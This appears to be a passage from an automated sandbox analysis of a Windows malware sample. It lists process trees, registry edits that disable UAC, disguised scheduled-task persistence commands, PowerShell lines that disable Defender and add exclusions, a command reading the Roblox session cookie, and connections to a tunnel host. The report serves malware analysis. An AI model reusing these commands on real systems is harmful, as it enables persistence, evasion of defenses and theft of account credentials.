PID 2516 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2344 wrote to memory of 548 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2344 wrote to memory of 548 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3428 wrote to memory of 3240 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3428 wrote to memory of 3240 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4720 wrote to memory of 2464 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 4720 wrote to memory of 2464 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 5024 wrote to memory of 1104 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 5024 wrote to memory of 1104 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3196 wrote to memory of 3216 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3196 wrote to memory of 3216 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2012 wrote to memory of 1252 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2012 wrote to memory of 1252 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3528 wrote to memory of 744 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3528 wrote to memory of 744 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 1908 wrote to memory of 3636 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 1908 wrote to memory of 3636 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3672 wrote to memory of 4264 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3672 wrote to memory of 4264 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2516 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2516 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4068 wrote to memory of 3040 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 4068 wrote to memory of 3040 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4624 wrote to memory of 1320 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 4624 wrote to memory of 1320 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\cmd.exe
PID 2516 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\cmd.exe
PID 4560 wrote to memory of 832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4560 wrote to memory of 832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 832 wrote to memory of 4872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe
PID 832 wrote to memory of 4872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SYSTEM32\CMD.exe

"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Teams Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Teams Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "OBS Studio" /tr "C:\Users\Admin\AppData\Local\xdwdGreenshot.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo 5 /tn "OBS Studio" /tr "C:\Users\Admin\AppData\Local\xdwdGreenshot.exe" /RL HIGHEST

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
BE 2.17.107.131:443 www.bing.com tcp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 131.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 8.8.8.8:53 20.221.185.147.in-addr.arpa udp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 142.53.16.96.in-addr.arpa udp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
